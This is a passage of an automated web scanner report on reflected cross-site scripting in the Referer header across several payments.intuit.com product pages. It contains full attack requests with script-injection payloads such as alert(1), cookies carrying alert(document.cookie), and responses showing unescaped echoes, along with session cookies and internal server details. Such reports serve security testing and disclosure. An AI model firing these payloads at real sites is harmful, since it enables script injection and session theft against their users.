Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zL8CCL7bM1jx4tivEw418w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96173AA0A0805192AA117E350D74E02
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145490


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c | -->
...[SNIP]...

1.47. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7408f'-alert(1)-'85140b02fc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:38 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=KXchY7zOwHEUHqUESwiMjg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:39 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9610A390A0805192AA117E38D800405
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140381


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7';
                   </script>
...[SNIP]...

1.48. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee311--><script>alert(1)</script>ebc26ad0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JuEIdSq8Lvf1p84mE3Y8ZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961352D0A0805192AA117E3214A5750
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=ee311--><script>alert(1)</script>ebc26ad0fcf | -->
...[SNIP]...

1.49. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d4413--><script>alert(1)</script>903e8593f48 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Gip6gRfT-so3qVBtC6GzuQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F89B0A0805192AA117E3E7C08A67
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133395


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d4413--><script>alert(1)</script>903e8593f48 | -->
...[SNIP]...

1.50. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c386'-alert(1)-'4f235ab0373 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FrlChAgtaNosF3G6WcIxAg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C5470A0805192AA117E35410D15A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133364


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373';
                   </script>
...[SNIP]...

1.51. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd842'-alert(1)-'54daf563e41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kqRkVYeMrNDFvcp7PtLGZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961303D0A0805192AA117E3B8A62CFA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41';
                   </script>
...[SNIP]...

1.52. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 6a030--><script>alert(1)</script>f0702fdbff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=BxeGx4m3z2EJ+m3XOlmO7A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614DF20A0805192AA117E30B39989D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116205


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1 | -->
...[SNIP]...

